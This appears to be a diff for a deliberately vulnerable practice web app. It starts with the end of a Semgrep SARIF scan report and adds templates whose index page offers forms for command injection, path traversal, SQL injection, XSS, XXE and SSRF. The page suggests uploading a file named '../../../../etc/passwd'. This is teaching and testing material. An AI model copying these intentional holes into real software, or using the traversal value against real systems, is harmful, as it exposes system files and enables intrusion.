Rule](https://semgrep.dev/r/ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"Detected hardcoded password used in basic authentication in a controller class. Including this password in version control could expose this credential. Consider refactoring to use environment variables or configuration files."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller","id":"ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller","name":"ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In PHP, this can lead to both local file inclusion (LFI) or remote file inclusion (RFI) if user input reaches this statement. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In PHP, this can lead to both local file inclusion (LFI) or remote file inclusion (RFI) if user input reaches this statement. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-path-traversal.laravel-path-traversal)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#path-traversal](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#path-traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In PHP, this can lead to both local file inclusion (LFI) or remote file inclusion (RFI) if user input reaches this statement. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-path-traversal.laravel-path-traversal","id":"php.laravel.security.laravel-path-traversal.laravel-path-traversal","name":"php.laravel.security.laravel-path-traversal.laravel-path-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-path-traversal.laravel-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password","id":"java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password","name":"java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password","id":"python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password","name":"python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://www.stackhawk.com/blog/command-injection-python/](https://www.stackhawk.com/blog/command-injection-python/)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi","id":"python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi","name":"python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret","id":"go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret","name":"go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret","id":"swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret","name":"swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string","id":"javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string","name":"javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec","id":"java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec","name":"java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"If an attacker controls the x in require(x) then they can cause code to load that was not intended to run on the server."},"help":{"markdown":"If an attacker controls the x in require(x) then they can cause code to load that was not intended to run on the server.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.require-request.require-request)\n - [https://github.com/google/node-sec-roadmap/blob/master/chapter-2/dynamism.md#dynamism-when-you-need-it](https://github.com/google/node-sec-roadmap/blob/master/chapter-2/dynamism.md#dynamism-when-you-need-it)\n","text":"If an attacker controls the x in require(x) then they can cause code to load that was not intended to run on the server."},"helpUri":"https://semgrep.dev/r/javascript.express.security.require-request.require-request","id":"javascript.express.security.require-request.require-request","name":"javascript.express.security.require-request.require-request","properties":{"precision":"very-high","tags":["CWE-706: Use of Incorrectly-Resolved Name or Reference","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.require-request.require-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda","id":"python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda","name":"python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false","id":"python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false","name":"python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header","id":"java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header","name":"java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.code.tainted-code-stdlib.tainted-code-stdlib)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://www.stackhawk.com/blog/command-injection-python/](https://www.stackhawk.com/blog/command-injection-python/)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/python.lang.code.tainted-code-stdlib.tainted-code-stdlib","id":"python.lang.code.tainted-code-stdlib.tainted-code-stdlib","name":"python.lang.code.tainted-code-stdlib.tainted-code-stdlib","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.code.tainted-code-stdlib.tainted-code-stdlib"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password","id":"ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password","name":"ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `marshal` module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections, such as json, PyYAML, or ruamel.yaml."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `marshal` module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections, such as json, PyYAML, or ruamel.yaml.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://docs.python.org/3/library/marshal.html](https://docs.python.org/3/library/marshal.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `marshal` module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections, such as json, PyYAML, or ruamel.yaml."},"helpUri":"https://semgrep.dev/r/python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid","id":"python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid","name":"python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid"}}],"semanticVersion":"1.96.0"}}}],"$schema":"https://docs.oasis-open.org/sarif/sarif/v2.1.0/os/schemas/sarif-schema-2.1.0.json"} \ No newline at end of file diff --git a/insecure-app/templates/base.html b/insecure-app/templates/base.html new file mode 100644 index 0000000..2995200 --- /dev/null +++ b/insecure-app/templates/base.html @@ -0,0 +1,189 @@ + + + + + + {% block title %}Insecure App - Hacker's Playground{% endblock %} + + + +
+
+ {% block content %}{% endblock %} +
+ + + + \ No newline at end of file diff --git a/insecure-app/templates/index.html b/insecure-app/templates/index.html new file mode 100644 index 0000000..158403f --- /dev/null +++ b/insecure-app/templates/index.html @@ -0,0 +1,69 @@ +{% extends "base.html" %} + +{% block title %}Insecure App - Hacker's Playground{% endblock %} + +{% block content %} +

Insecure App - Hacker's Playground

+
+ +
+

Command Injection

+
+ + +
+
+ +
+

Path Traversal via File Upload

+
+ + +
+

Try uploading a file named: ../../../../etc/passwd

+
+ +
+

SQL Injection

+
+ + +
+
+ +
+

Cross-Site Scripting (XSS)

+
+ + +
+
+ +
+

XML External Entity (XXE) Injection

+
+ + +
+
+ +
+

Server-Side Request Forgery (SSRF)

+
+ + +
+
+ +
+

SQL Injection 2

+
+ + +
+
